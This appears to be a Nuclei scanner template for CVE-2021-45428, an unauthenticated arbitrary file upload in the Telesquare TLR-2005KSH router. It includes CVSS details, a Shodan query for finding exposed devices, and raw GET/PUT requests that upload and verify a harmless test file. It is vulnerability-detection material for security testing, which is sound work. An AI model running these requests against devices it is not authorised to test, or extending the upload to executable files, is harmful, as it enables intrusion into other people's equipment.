nuclei-templates/http/cves/2021/CVE-2021-45428.yaml

53 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2021-45428
info:
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
author: gy741
severity: critical
2022-05-19 19:14:47 +00:00
description: |
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability.
reference:
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
2022-05-19 19:14:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45428
cwe-id: CWE-639
2023-08-31 11:46:18 +00:00
epss-score: 0.08441
epss-percentile: 0.93763
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: telesquare
product: tlr-2005ksh_firmware
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"TLR-2005KSH"
tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm
http:
- raw:
- |
2022-05-19 19:14:47 +00:00
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
- |
2022-05-19 19:14:47 +00:00
PUT /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
2022-05-19 19:14:47 +00:00
CVE-2021-45428
- |
2022-05-19 19:14:47 +00:00
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
2022-05-19 19:14:47 +00:00
- 'status_code_1 == 404 && status_code_2 == 201'
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
condition: and
# digest: 4a0a0047304502200bca4e591ccce47ee6c030763558725c0b23c7327156804d1cfbf33fe50287a1022100aec127c2390d5615cac4bc852bd528b685de4844b5de5d0f87a2c9465842d202:922c64590222798bb761d5b6d8e72950